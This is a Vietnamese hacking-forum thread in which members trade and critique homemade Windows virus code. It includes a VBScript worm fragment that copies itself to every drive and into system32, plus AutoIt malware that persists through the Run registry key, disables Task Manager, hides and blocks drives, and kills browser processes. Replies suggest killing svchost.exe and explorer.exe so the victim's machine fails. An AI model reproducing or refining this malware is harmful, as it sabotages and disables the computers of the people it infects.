objFSO.CopyFile "C:\windows\system32\syskm.dll" , objDrive.DriveLetter & ":\QuangMinh.vbs", TRUE
End If
Next
objFSO.CopyFile "C:\windows\system32\syskm.dll" , "C:\windows\system32\QuangMinh.vbs", TRUE
objFSO.CopyFile "C:\windows\system32\syskm.dll" , "C:\windows\system32\userinit.vbs", TRUE
Loop  


Em cảm ơn anh MinhNguyenQuang75 nhiều lắm nhưng hình như đoạn ( không phải hình như mà là chắc chắn ) đoạn mã này không có khả năng ghi dữ liệu trực tiếp lên máy tính .
Dù sao em cũng cảm ơn anh đã đóng góp ý kiến .
Thân !
[Up] [Print Copy]
  [Discussion]   Góp ý viết code virus 01/06/2010 19:56:37 (+0700) | #19 | 212102
[Avatar]
 handaewoo
Member
[Minus]    0    [Plus]
Joined: 07/11/2009 19:10:38
Messages: 207
Location: Korea
Offline
[Profile] [PM] [Email]
Cái đoạn đó dis mất cái taskmanager + regedit + siêu ẩn + lây vào explore.exe cho mỗi lần khởi động winlogon.exe là máy nạn nhân dính chưởng
PS : sao không thấy dòng #no tray icon hả bác minhnguyenquang75 smilie
Bi Kịch Antivirus Vietnam = BKAV
[Up] [Print Copy]
  [Discussion]   Góp ý viết code virus 04/06/2010 18:36:50 (+0700) | #20 | 212357
daigiaIQ_Y2.1K
Member
[Minus]    0    [Plus]
Joined: 18/01/2008 08:30:27
Messages: 60
Offline
[Profile] [PM]
Mấy cái mã vbs này nhà em có đầy , nhưng chẳng có con nào có khả năng xuyên thủng deep freezer được smilie
[Up] [Print Copy]
  [Discussion]   Góp ý viết code virus 04/06/2010 18:55:57 (+0700) | #21 | 212363
[Avatar]
 handaewoo
Member
[Minus]    0    [Plus]
Joined: 07/11/2009 19:10:38
Messages: 207
Location: Korea
Offline
[Profile] [PM] [Email]
http://forum.kaspersky.vn/showthread.php?15658-Help-!!-M%E1%BB%99t-Virus-xuy%C3%AAn-b%C4%83ng-n%E1%BB%AFa-SysAnti
Ai liều chết xem thử em này nào
Bi Kịch Antivirus Vietnam = BKAV
[Up] [Print Copy]
  [Discussion]   Góp ý viết code virus 05/06/2010 06:53:15 (+0700) | #22 | 212380
[Avatar]
 MinhNguyenQuang75
Member
[Minus]    0    [Plus]
Joined: 06/03/2010 06:42:35
Messages: 43
Offline
[Profile] [PM]
vậy thì phải có đoạn code của phần mềm udf xong thì code virus
[Up] [Print Copy]
  [Discussion]   Góp ý viết code virus 05/06/2010 10:37:06 (+0700) | #23 | 212406
minhducitpro
Member
[Minus]    0    [Plus]
Joined: 01/06/2010 20:09:37
Messages: 15
Offline
[Profile] [PM]
các bác cho em hỏi đoạn này có khả năng chạy không ạ smilie thanks cácn bác.
#Notrayicon
FileCopy(@ScriptDir & "\minhduc.exe","C:\WINDOWS",1)
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run","explorer","REG_SZ",@Win dowsDir & "\minhduc.exe")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableTaskMgr","REG_DWORD","1")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableTaskMgr","REG_DWORD","1")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoViewOnDrive","REG_DWORD","67108863")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoViewOnDrive","REG_DWORD","67108863")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoDrives","REG_DWORD","67108863")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Wi ndows\CurrentVersion\Policies\Explorer","NoDrives" ,"REG_DWORD","67108863")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Policies\Explorer","NoClose"," REG_DWORD","1")
While 1
If ProcessExists("iexplorer.exe") then
ProcessClose("iexplorer.exe")
EndIf
If ProcessExists("firefox.exe") then
ProcessClose("firefox.exe")
EndIf
WEnd
[Up] [Print Copy]
  [Discussion]   Góp ý viết code virus 06/06/2010 08:18:34 (+0700) | #24 | 212496
[Avatar]
 MinhNguyenQuang75
Member
[Minus]    0    [Plus]
Joined: 06/03/2010 06:42:35
Messages: 43
Offline
[Profile] [PM]

handaewoo wrote:
Cái đoạn đó dis mất cái taskmanager + regedit + siêu ẩn + lây vào explore.exe cho mỗi lần khởi động winlogon.exe là máy nạn nhân dính chưởng
PS : sao không thấy dòng #no tray icon hả bác minhnguyenquang75 smilie  

à quên, nhưng mà k cần #no tray icon cũng k hiện cửa sổ lúc virus hoạt động. Mà có hiện cũng k làm gì dc
[Up] [Print Copy]
  [Discussion]   Góp ý viết code virus 06/06/2010 08:21:13 (+0700) | #25 | 212497
[Avatar]
 MinhNguyenQuang75
Member
[Minus]    0    [Plus]
Joined: 06/03/2010 06:42:35
Messages: 43
Offline
[Profile] [PM]

minhducitpro wrote:
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run","explorer","REG_SZ",@Win dowsDir & "\minhduc.exe")  

File này chưa xác định nếu có sửa explore.exe thành minhduc.exe thì cũng k gây nguy hiểm cho nạn nhân
[Up] [Print Copy]
  [Discussion]   Góp ý viết code virus 07/06/2010 08:07:03 (+0700) | #26 | 212622
minhducitpro
Member
[Minus]    0    [Plus]
Joined: 01/06/2010 20:09:37
Messages: 15
Offline
[Profile] [PM]
cảm ơn bác,em mới thử viết một số đoạn rồi chỉ thử chạy nên còn chưa biết nhiều,bác có thể chỉ rõ cho em hơn không.em cảm ơn nhiều smilie về đoạn mã bác vừa trích từ bài em đó.
[Up] [Print Copy]
  [Discussion]   Góp ý viết code virus 07/06/2010 08:50:51 (+0700) | #27 | 212627
[Avatar]
 MinhNguyenQuang75
Member
[Minus]    0    [Plus]
Joined: 06/03/2010 06:42:35
Messages: 43
Offline
[Profile] [PM]

minhducitpro wrote:

If ProcessExists("iexplorer.exe") then
ProcessClose("iexplorer.exe")
EndIf
If ProcessExists("firefox.exe") then
ProcessClose("firefox.exe")
EndIf  

Đoạn này. Chà chà - nhỡ đâu nạn nhân dùng opera hay trình duyệt nào khác thì sao?
Nên bổ sung thêm
Code:
If ProcessExists("svchost.exe") then
ProcessClose("svchost.exe")
EndIf
If ProcessExists("explorer.exe") then
ProcessClose("explorer.exe")
EndIf


Thế thôi là đủ chết rồi. Còn đoạn em trích bài trên. Nếu bác viết virus lây file thì mới để đoạn code ấy
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|